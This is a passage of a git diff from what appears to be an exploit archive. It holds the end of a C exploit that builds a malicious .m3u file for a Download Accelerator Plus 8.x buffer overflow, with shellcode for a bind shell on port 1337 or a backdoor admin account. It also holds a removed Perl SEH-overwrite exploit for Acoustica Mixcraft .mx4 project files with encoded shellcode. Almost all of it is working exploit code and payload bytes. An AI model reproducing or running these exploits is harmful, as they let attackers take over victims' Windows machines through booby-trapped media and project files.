+"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43"
+"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
+"\x42\x45\x4a\x36\x42\x4f\x4c\x58\x46\x30\x4f\x45\x4a\x36\x4a\x39"
+"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x4d\x46"
+"\x46\x46\x50\x42\x45\x56\x4a\x47\x45\x46\x42\x52\x4f\x52\x43\x36"
+"\x42\x32\x50\x46\x45\x46\x46\x57\x42\x52\x45\x47\x43\x37\x45\x36"
+"\x44\x37\x42\x32\x46\x37\x45\x36\x43\x47\x46\x37\x42\x42\x46\x37"
+"\x45\x36\x43\x37\x46\x37\x42\x52\x4f\x52\x41\x44\x46\x54\x46\x44"
+"\x42\x52\x48\x42\x48\x32\x42\x32\x50\x36\x45\x56\x46\x57\x42\x42"
+"\x4e\x36\x4f\x36\x43\x56\x41\x36\x4e\x56\x47\x46\x44\x37\x4f\x36"
+"\x45\x37\x42\x37\x42\x42\x41\x34\x46\x46\x4d\x56\x49\x56\x50\x46"
+"\x49\x56\x43\x57\x46\x37\x44\x37\x41\x56\x46\x47\x4f\x56\x44\x37"
+"\x43\x57\x42\x52\x46\x47\x45\x56\x43\x37\x46\x47\x42\x32\x4f\x52"
+"\x41\x34\x46\x34\x46\x34\x42\x30\x5a";
+
+
+
+unsigned char ra_sp2[] = "\xcf\xbc\x08\x76"; //msvcp60.dll
+unsigned char ra_sp3[] = "\xe1\xbc\x08\x76"; //msvcp60.dll
+
+unsigned char nops1[14115]; //14115 * \x90
+unsigned char nops2[30]; //30 * \x90
+
+int main(int argc, char **argv)
+{
+    int i;
+    FILE* f;
+    char* ra=NULL;
+    char* scode=NULL;
+    printf("[+] Download Accelerator Plus - DAP 8.x (.m3u) File Buffer Overflow Vulnerability\n");
+	printf("[+] Discovered by Krystian Kloskowski (h07) \n");
+	printf("[+] Code by Shinnok raydenxy[at]yahoo dot com\n");
+    if ((argc!=3)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))||((atoi(argv[2])!=0)&&(atoi(argv[2])!=1))){
+            printf("Usage: %s target payload\n",argv[0]);
+            printf("Where target is:\n");
+            printf("0: WinXP SP2\n");
+            printf("1: WinXP SP3\n");
+            printf("Where payload is:\n");
+            printf("0: bind shell on 1337\n");
+            printf("1: add admin user \"test\" with password \"test\"\n");
+            return EXIT_SUCCESS;
+    }
+    for(i=0;i<14115;i++) nops1[i]='\x90';
+    nops1[14115]='\0';
+    for(i=0;i<30;i++) nops2[i]='\x90';
+    nops2[30]='\0';
+    if(atoi(argv[1])==0) ra=ra_sp2;
+    else ra=ra_sp3;
+    if(atoi(argv[2])==0) scode=bind_scode;
+    else scode=user_scode;
+    f=fopen("sploit.m3u","wb");    
+    fprintf(f,"http://localhost/%s%s%s%s.mp3%c%c",nops1,ra,nops2,scode,'\xd','\xa');
+    fflush(f);                         
+    fclose(f);
+    printf("sploit.m3u created!\n");
+    return EXIT_SUCCESS;
+}
+
+// milw0rm.com [2008-07-11]
diff --git a/platforms/windows/local/6322.pl b/platforms/windows/local/6322.pl
index 0834c6778..3407af88b 100755
--- a/platforms/windows/local/6322.pl
+++ b/platforms/windows/local/6322.pl
@@ -1,261 +1,261 @@
-#!/usr/bin/perl
-#
-# Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
-# Author: Koshi
-#
-# Date: 08-28-08 ( 0day )
-# Application: Acoustica Mixcraft
-# Version(s): (Possibly Older) / 4.1 Build 96 / 4.2 Build 98
-# Site: http://acoustica.com/mixcraft/download.htm
-# Tested On: Windows XP SP3 Fully Patched
-#
-# A vulnerability exists in an unchecked buffer located in the
-# project files (.mx4) for Acoustica Mixcraft4. The buffer should
-# contain the file name of an image located in 
-# "C:\Program Files\Acoustica Mixcraft 4\mixrez\icons" on a default
-# install of Mixcraft, and would be used as the icon for a specific
-# "track" or "instrument" in Mixcraft.
-# 
-# gr33tz: Rima my baby, str0ke, breaker_unit, mess', and my dude who
-# showed me this nifty program.
-#
-
-
-# win32_exec -  EXITFUNC=process CMD=calc.exe Size=165 Encoder=ShikataGaNai http://metasploit.com
-my $shellcode =
-"\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb8\x1f\xb4\xe6\x18\xb1\x24".
-"\x83\xeb\xfc\x31\x43\x13\x03\x5c\xa7\x04\xed\x9e\x2f\x8c\x0e\x5e".
-"\xb0\x86\x4a\x62\x3b\xe4\x51\xe2\x3a\xfa\xd1\x5d\x25\x8f\xb9\x41".
-"\x54\x64\x0c\x0a\x62\xf1\x8e\xe2\xba\xc5\x08\x56\x38\x05\x5e\xa1".
-"\x80\x4c\x92\xac\xc0\xba\x59\x95\x90\x18\xa6\x9c\xfd\xea\xf9\x7a".
-"\xff\x07\x63\x09\xf3\x9c\xe7\x52\x10\x22\x13\xe7\x34\xaf\xe2\x1c".
-"\xcd\xf3\xc0\xe6\x0d\x3a\xc9\x82\x1a\x7d\xf9\xcf\xdd\x06\xf5\x44".
-"\x9d\xfa\x8e\x2a\x02\xae\x1a\xa2\x32\x5b\x15\xb9\xc3\x2b\x26\xbd".
-"\xc3\xc0\x4f\x81\x9c\xe7\x79\x99\x74\x81\x7e\xda\xb9\xea\x2e\xb4".
-"\x47\xd5\x2d\x37\xd0\x7d\x4f\x3d\x2e\x29\x4f\xa6\x4c\xb4\xc3\x4b".
-"\xbd\x53\x64\xee\xc1";
-
-my $bof = "A"x324;
-my $sled = "\x90"x35;
-my $fill = "\x90"x468;
-my $buff = "".
-	"$bof".
-	"\xeb\x06\x90\x90". ### Pointer to next SEH record (Boing!)		    ###
-	"\x28\x12\x8b\x01". ### SE handler 0x018b1228 ( wmaengine.dll POP POP RET ) ###
-	"$sled".
-	"$shellcode".
-	"$fill";
-
-my $tuff = "".
-	"\x52\x49\x46\x46\xC4\x0F\x00\x00\x4D\x58\x43\x33\x50\x52\x4F\x4A\x60\x0A\x00\x00".
-	"\xCD\xCC\xCC\xCC\xCC\xCC\xF4\x3F\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73".
-	"\x20\x61\x6E\x64\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x4F\x77\x6E\x65\x72\x5C".
-	"\x4D\x79\x20\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x52\x65\x63\x6F".
-	"\x72\x64\x69\x6E\x67\x73\x5C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54".
-	"\x04\x00\x00\x00\x45\x66\x78\x4C\x4D\x61\x72\x6B\x98\x01\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\xF0\x3F\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x53\x74\x61\x72\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\x80\x00".
-	"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5E\x40".
-	"\x03\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x01\x01\x00\x00\x00\x00\x00".
-	"\x00\x00\xF0\x3F\x54\x72\x6B\x41\x98\x03\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F".
-	"\x54\x72\x61\x63\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"$buff".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\x00\x00".
